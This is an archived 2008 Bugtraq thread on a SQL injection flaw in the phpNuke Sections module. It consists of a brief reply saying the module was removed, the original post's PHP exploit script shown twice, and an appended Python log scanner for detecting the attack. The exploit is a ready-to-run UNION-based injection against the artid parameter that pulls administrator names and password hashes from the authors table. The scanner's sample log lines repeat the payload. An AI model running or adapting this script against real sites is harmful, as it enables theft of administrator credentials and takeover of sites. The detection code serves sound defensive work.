Re: php-nuke 8.0 module sections artid blind sql inj vuln.

2008-12-31 Thread John Haywood
The 'Sections' module was removed from phpNuke years ago, probably
around version 7.4 (2006) and was replaced by the 'Content' module.

John Haywood


-----Original Message-----
From: the.dume...@gmail.com
To: bugtraq@securityfocus.com
Subject: php-nuke 8.0 module sections artid blind sql inj vuln.
Date: 30 Dec 2008 14:31:59 -

 version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . "   [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* Description */
if (empty($argv[3])){ $prefix = 'nuke';} # Enter the prefix.
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query = "modules.php?name=Sections&op=printpage&artid=9+union+select+aid,pwd+from+".$prefix."_authors";
$version = 6;
break;
default:
$query = "modules.php?name=Sections&op=printpage&artid=9'+union+select+aid,pwd+from+".$prefix."_authors";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Hashs.: ".$matches[0];
if (preg_match("/(?<=\\)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Basarısız(Exploit Failed)...";}

credits();


function credits(){
print "\n\n++\n\r Coded By dumenci \n\r 
Copyright (c) BugBUSTERs";
print "\n\r++\n";
exit;
}

?>




php-nuke 8.0 module sections artid blind sql inj vuln.

2008-12-30 Thread the . dumenci
 version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . "   [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* Description */
if (empty($argv[3])){ $prefix = 'nuke';} # Enter the prefix.
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query = "modules.php?name=Sections&op=printpage&artid=9+union+select+aid,pwd+from+".$prefix."_authors";
$version = 6;
break;
default:
$query = "modules.php?name=Sections&op=printpage&artid=9'+union+select+aid,pwd+from+".$prefix."_authors";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Hashs.: ".$matches[0];
if (preg_match("/(?<=\\)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Basarısız(Exploit Failed)...";}

credits();


function credits(){
print "\n\n++\n\r Coded By dumenci \n\r 
Copyright (c) BugBUSTERs";
print "\n\r++\n";
exit;
}

?>
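
A log check for the request pattern used in the script above, added here as an example and not part of either post: it flags `modules.php?name=Sections` requests whose `artid` is not a plain integer. The log lines are constructed samples in combined log format, and the function names are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample entries (combined log format, documentation-range IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2008:14:40:01 +0000] "GET /modules.php?name=Sections&op=printpage&artid=9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Dec/2008:14:41:12 +0000] "GET /modules.php?name=Sections&op=printpage&artid=9+union+select+aid,pwd+from+nuke_authors HTTP/1.0" 200 4312 "-" "-"',
    '198.51.100.7 - - [30/Dec/2008:14:41:13 +0000] "GET /modules.php?name=Sections&op=printpage&artid=9%27+union+select+aid,pwd+from+nuke_authors HTTP/1.0" 200 4290 "-" "-"',
    '203.0.113.5 - - [30/Dec/2008:14:42:00 +0000] "GET /modules.php?name=Content&pa=showpage&pid=3 HTTP/1.1" 200 7001 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SQL_TOKENS = re.compile(r"\b(?:union|select|from)\b|['\"]|--|/\*", re.I)


def classify_artid(target):
    """Return the decoded artid if a Sections request carries a non-integer one, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("modules.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # first URL-decode pass
    if "sections" not in (v.lower() for v in params.get("name", [])):
        return None
    for once_decoded in params.get("artid", []):
        value = unquote_plus(once_decoded)  # second pass catches double-encoding
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None


def scan(lines):
    """Return one finding per log line whose artid is not a plain integer."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        artid = classify_artid(m.group("target"))
        if artid is not None:
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                             "artid": artid,
                             "sql_tokens": bool(SQL_TOKENS.search(artid))})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The integer test on `artid` is the primary signal; `sql_tokens` is only a triage hint for sorting flagged lines.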